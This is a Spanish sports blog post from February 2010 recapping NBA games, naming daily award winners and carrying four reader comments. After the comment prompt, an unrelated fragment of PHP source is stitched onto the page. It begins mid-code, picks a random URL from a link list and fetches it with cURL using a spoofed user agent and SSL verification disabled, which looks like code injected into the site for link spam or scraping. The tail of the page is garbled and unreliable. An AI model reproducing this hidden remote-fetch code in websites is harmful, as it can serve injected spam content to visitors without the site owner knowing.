La Crónica 19/02/2010

20 de February de 2010 por TheDeerHunter

Un poco chasco el debut de Jamison… No es que pensemos que será la tónica general pero segunda derrota consecutiva de Cleveland, en esta ocasión contra unos Bobcats donde sí fue importante Tyrus Thomas. Todavía nos estamos aprendiendo tanto traspaso. Nos da que el buy-out de Ilgauskas va a ser más importante de lo que se pensaba al principio.

Aprovecharon el traspiés los Celtics dándoles un baño defensivo a los Blazers en su propia casa. No así los Magic, a pesar de Howard y es que los Mavs han empezado a sacar rendimiento a sus fichajes. Extraordinario Haywood y bien Butler. Para tanto buen banquillo el de Orlando estuvo nulo. Tampoco pudieron recortar los Hawks que estuvieron flojitos en su visita a Phoenix. Amare muy sólido a pesar de haberse frustrado su traspaso.

De los otros encuentros, podemos destacar a Beasley, que cuajó uno de los mejores partidos de su carrera en el choque con doble prórroga contra los Grizzlies, con Wade lesionado. El nuevo batacazo de los Spurs en Philadelphia también es digno de mención. Los Nuggets también se vieron sorprendidos en Washington, en el debut de Al Thornton que en su primer partido en su nuevo equipo ha jugado mejor que en todo el año (y parte de los anteriores).

Finalmente, Hornets ganaron a Pacers, los Bucks a los Pistons con Salmons tocando la guitarra, los Bulls a los Wolves, los Jazz a los Warriors y los Raptors a los Nets sin necesidad de que jugara Bosh.

PREMIOS

MVP: Elegiremos a Carlos Boozer, con 30-16, ilustrando el dulce momento que viven los Jazz.

El rookie: Una de las grandes sensaciones de la temporada es el substituto de Paul en New Orleans. Triplaco doble para Darren Collison que nos deja con la boca abierta. 18-13-12 los números de la bestia…

La sorpresa: Ni estaba ni se le esperaba. Llevábamos tiempo señalando el camino a los infiernos de Al Thornton pero el cambio de aires le va bien a él y a su nuevo equipo. Por cierto, que hizo dúo estelar con Josh Howard. Parejita interesante de ¿ex? blufs

La decepción: 0 de 12 para Jamison… será el Jet-lag

El mayor esfuerzo en vano: Grandísimo Dwight Howard que está en un gran estado de forma. Se lo puso muy difícil Brendan Haywood y desde ahí empezó a perder el partido.

Comenta

4 comentarios a esta entrada

  1. kantonyo dice:
    #1

    A pesar de la marcha de Butler, Jamison y Haywood, tengo la sensación de que los Wizards tienen ahora un equipo más competitivo:

    Arenas(Boykins), Foye(Miller), Thornton(Young), J.Howard, Blatche(McGee).

      Citar

  2. sergio dice:
    #2

    Lo de los Bobcats es una locura… le han ganado los 3 partidos a los Cavs si no me equivoco. Y tambien han perdido los 2 ante New Jersey. Si alguien lo entiendo que me lo explique.

    Lo de Jamison fue de pena. Lo pude ver en directo y es que de esos 12 tiros, entre tapones recibidos y “air-balls” fueron 10… Cada vez que me pongo a ver a los Cavs pienso que dependen mucho de un (super)jugador. Su juego interior es bastante pobre y falto de centimetros… y eso en Playoffs es una losa.

      Citar

  3. Dantley2 dice:
    #3

    Para mí montones de sorpresones. Que los Wizards rindan me parece tremendo, a ver si les aguantan las ganas a Howard y Thornton.

    No he visto a Collison, ¿alguien le ha visto algún partido esta temporada? A mí me parecía demasiado plano en UCLA, pero ya son demasiados partidos destacando. Paul prescindible???

      Citar

  4. kantonyo dice:
    #4

    No sé si Paul será prescindible, pero creo que Collison puede ser titular en muchas de las franquicias de la liga. A tiempo pasado es fácil decirlo, pero fue elegido en el draft por detras de Maynor y Teague, totalmente desaparecidos en lo que va de año.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>